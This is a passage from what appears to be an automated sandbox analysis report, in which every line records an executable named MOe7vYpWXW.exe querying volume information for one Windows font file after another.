Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
